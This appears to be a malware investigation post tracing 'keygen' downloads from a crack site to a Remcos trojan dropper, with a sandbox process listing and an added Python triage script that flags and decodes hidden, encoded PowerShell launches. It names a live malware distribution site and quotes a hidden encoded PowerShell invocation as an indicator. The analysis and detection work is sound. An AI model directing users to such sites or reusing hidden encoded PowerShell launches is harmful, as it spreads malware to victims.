

So you want to download some releases from SnD? Alright, let's have a look: the distribution section of the menu contains a link pointing at hxtps://keygens.pro/

Super, looks like there are a lot of cracks over here! And the site is virus free, right?

So let's pick something, I don't know, maybe .1.1.keygen-SND hxtps://keygens.pro/crack/729775/

Lol, the description on the page: I didn't know Reagan was from SnD and born in Russia.

Anyway, after clicking the 'Download only Keygen' button we get redirected to a download page where we have to fill in a captcha and agree to the conditions. The archive is password protected and contains only one file, "setup_pass-123.exe".

Antiviruses aren't really happy about the file when it is sent to VirusTotal, but hey, that's kind of normal, it's a crack after all. If we try to download some other random files from the keygens.pro collection, sometimes there are variations. E.g. .keygen-URET hxtps://keygens.pro/crack/733508/ contains a 'readme.txt', but we still have our suspicious setup_pass-123.exe inside.

The file in question is massively identified as 'remcos' (Avira, Kaspersky, F-Secure...). Remcos is a known trojan, and this time they are right. I've sent the file to my CAPEv2 (like Cuckoo Sandbox, but with Python 3), which also identified it as Remcos, and even the exact version: 2.7.0 Pro.

Process listing from the sandbox report (process name, PID, command line; the base64 argument of -e is cut short in this excerpt):

Lsass.exe 2992 C:\Windows\system32\lsass.exe
Services.exe 484 C:\Windows\system32\services.exe
Powershell.exe 764 powershell -w 1 -e cwB0AGEAcgB0AC0A
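The PowerShell command line in the process listing above is the kind of thing a triager wants to decode immediately: `-w 1` is `-WindowStyle Hidden` (1 is the numeric value of ProcessWindowStyle.Hidden) and `-e` is `-EncodedCommand`, whose argument is base64 of the UTF-16LE script text. The script below is an added example, not code from the original post or from CAPEv2; it takes the three process entries shown on this page as constructed input, flags PowerShell launches with a hidden window or an encoded command, and decodes the encoded argument. The sixteen base64 characters visible in the report decode to `start-`, which is only a prefix, so the decoder also tolerates missing padding and a dangling half code unit from a truncated capture. Function names and the `PROCESS_LIST` layout are this example's own assumptions.

```python
import base64
import shlex

# Sandbox process listing as reported on this page: (image name, PID, command line).
# The -e argument is truncated in the report, so only a prefix of the script decodes.
PROCESS_LIST = [
    ("Lsass.exe", 2992, r"C:\Windows\system32\lsass.exe"),
    ("Services.exe", 484, r"C:\Windows\system32\services.exe"),
    ("Powershell.exe", 764, "powershell -w 1 -e cwB0AGEAcgB0AC0A"),
]

# -WindowStyle accepts either the ProcessWindowStyle name or its numeric value.
WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}


def is_encoded_flag(arg: str) -> bool:
    """powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand."""
    low = arg.lower()
    return low == "-ec" or (len(low) >= 2 and "-encodedcommand".startswith(low))


def is_window_flag(arg: str) -> bool:
    """-w, -win, -windowstyle ... all select -WindowStyle."""
    low = arg.lower()
    return len(low) >= 2 and "-windowstyle".startswith(low)


def decode_encoded_command(value: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE text.

    Tolerate a value that a report cut short: restore base64 padding and drop a
    dangling single byte that cannot form a UTF-16 code unit.
    """
    value = value.strip().strip("\"'")
    value += "=" * (-len(value) % 4)
    raw = base64.b64decode(value)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def triage_powershell(cmdline: str) -> dict:
    """Pull the launch flags a triager cares about out of one command line."""
    args = shlex.split(cmdline, posix=False)  # keep Windows quoting intact
    result = {"hidden_window": False, "encoded": False, "decoded": None}
    for i, arg in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else None
        if is_window_flag(arg) and nxt is not None:
            style = WINDOW_STYLES.get(nxt, nxt).lower()
            result["hidden_window"] = style == "hidden"
        elif is_encoded_flag(arg) and nxt is not None:
            result["encoded"] = True
            result["decoded"] = decode_encoded_command(nxt)
    return result


def find_suspicious(process_list) -> list:
    """Return (name, pid, triage) for every PowerShell process launched with an
    encoded command or a hidden window."""
    hits = []
    for name, pid, cmdline in process_list:
        if "powershell" not in cmdline.lower():
            continue
        t = triage_powershell(cmdline)
        if t["encoded"] or t["hidden_window"]:
            hits.append((name, pid, t))
    return hits


if __name__ == "__main__":
    for name, pid, t in find_suspicious(PROCESS_LIST):
        print(f"{name} (PID {pid}): hidden={t['hidden_window']} decoded={t['decoded']!r}")
```

Run against the page's listing it reports only PID 764, hidden window, decoded prefix `start-`. The prefix matching on flag names matters in practice: `-enc`, `-EncodedCommand` and `-e` are all accepted by powershell.exe, and detection rules that only look for the long form miss most real samples.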
